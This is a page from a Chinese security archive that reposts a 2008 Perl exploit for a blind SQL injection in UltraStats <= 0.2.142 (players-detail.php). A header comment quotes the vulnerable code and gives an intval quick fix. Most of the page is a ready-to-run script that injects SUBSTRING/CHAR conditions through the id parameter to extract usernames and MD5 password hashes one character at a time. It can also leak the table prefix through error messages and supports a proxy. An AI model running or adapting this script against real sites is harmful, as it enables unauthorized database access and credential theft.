首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit
来源:http://www.shooter-szene.de 作者:DNX 发布时间:2008-07-14  
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org
# [!] Detected...: 29.06.2008
# [!] Reported...: 04.07.2008
# [!] Response...: xx.xx.2008
#
# [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles.
#                  It is able to parse and consolidate the information it can gather from these logs,
#                  and put them into a MySQL Database with a very efficient and high optimiced database
#                  layout.
#
# [!] Bug........: $_GET['id'] in players-detail.php near line 52
#                 
#                  36: if ( isset($_GET['id']) )
#                  37: {
#                  38: // get and check
#                  39: $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
#
#                  52:     $sqlquery = "SELECT " .
#                  53: "sum( " .STATS_ALIASES . ".Count) as Count, " .
#                  54: STATS_ALIASES . ".Alias as Aliases_Alias, " .
#                  55: STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" .
#                  56: " FROM " . STATS_ALIASES .
#                  57: " WHERE PLAYERID = " . $content['playerguid'] . " " .
#                  58: GetCustomServerWhereQuery(STATS_ALIASES, false) .
#                  59: " GROUP BY " . STATS_ALIASES . ".Alias " .
#                  60: " ORDER BY Count DESC";
#
# [!] Tested on..: v0.2.136, v0.2.142
#
# [!] Solution...: no update from vendor till now
#
# [!] Quick fix..: in players-detail.php line 39:
#
#                  - replace:
#                      $content['playerguid'] = DB_RemoveBadChars($_GET['id']);
#
#                  - with:
#                      $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id']));
#

if(!$ARGV[1])
{
  print "\n                                  \\#'#/                              ";
  print "\n                                  (-.-)                               ";
  print "\n   --------------------------oOO---(_)---OOo--------------------------";
  print "\n   | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |";
  print "\n   |                          coded by DNX                           |";
  print "\n   ------------------------------------------------------------------";
  print "\n[!] Usage: perl ultrastats.pl [Host] [Path] <Options>";
  print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users";
  print "\n[!] Options:";
  print "\n       -o [no]       1 = username (default)";
  print "\n                     2 = password";
  print "\n                     3 = find database prefix (error based)";
  print "\n       -i [no]       Valid GUID, default is 1";
  print "\n       -l [no]       Limitation in sql query, -l 0 shows the first row,";
  print "\n                     -l 1 the second one and so on, default is 0";
  print "\n       -t [name]     Changed the user table name, default is stats_users";
  print "\n       -p [ip:port]  Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $target  = "username";
my $user    = 1;
my $limit   = 0;
my $table   = "stats_users";
my %options = ();
GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"i"})
{
  $user = $options{"i"};
}

if($options{"l"})
{
  $limit = $options{"l"};
}

if($options{"t"})
{
  $table = $options{"t"};
}

if($options{"o"} == 1)
{
  $target = "username";
  get_username();
}
elsif($options{"o"} == 2)
{
  $target = "password";
  get_password();
}
elsif($options{"o"} == 3)
{
  get_prefix();
}

sub get_username()
{
  syswrite(STDOUT, "[!] Username: ", 14);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 48;
    while(!$found && $h <= 57)
    {
      if(istrue2($host, $path, $table, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
    if(!$found)
    {
      $h = 64;
      while(!$found && $h <= 122)
      {
        if(istrue2($host, $path, $table, $i, $h))
        {
          $found = 1;
          syswrite(STDOUT, chr($h), 1);
        }
        $h++;
      }
    }
  } 
}

sub get_password()
{
  syswrite(STDOUT, "[!] MD5-Hash: ", 14);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 48;
    while(!$found && $h <= 57)
    {
      if(istrue2($host, $path, $table, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
    if(!$found)
    {
      $h = 97;
      while(!$found && $h <= 102)
      {
        if(istrue2($host, $path, $table, $i, $h))
        {
          $found = 1;
          syswrite(STDOUT, chr($h), 1);
        }
        $h++;
      }
    }
  }
}

sub get_prefix()
{
  my $ua = LWP::UserAgent->new;
  my $url = "http://".$host.$path."players-detail.php?id=".$user."'";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $response = $ua->get($url);
  my $content = $response->content;
 
  $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/;
  print "[!] Prefix: ".$1;
}

print "\n[!] Exploit done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $table = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $response = $ua->get($url);
  my $content = $response->content;
 
  my $regexp = "Top Hitlocations where you got killed by others";
  my $regexp2 = "Meist genutzte Aliases";
 
  if($content =~ /$regexp/ || $content =~ /$regexp2/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·fuzzylime cms 3.01 (commrss.ph
·Scripteen Free Image Hosting S
·Simple DNS Plus <= 5.0/4.1 Rem
·Yahoo Messenger 8.1 ActiveX Re
·AuraCMS <= 2.2.2 (pages_data.p
·Poppler <= 0.8.4 libpoppler un
·Galatolo Web Manager 1.3a <= X
·OllyDBG v1.10 and ImpREC v1.7f
·WinRemotePC Full+Lite 2008 r.2
·Download Accelerator Plus - DA
·Document Imaging SDK 10.95 Act
·trixbox (langChoice) Local Fil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved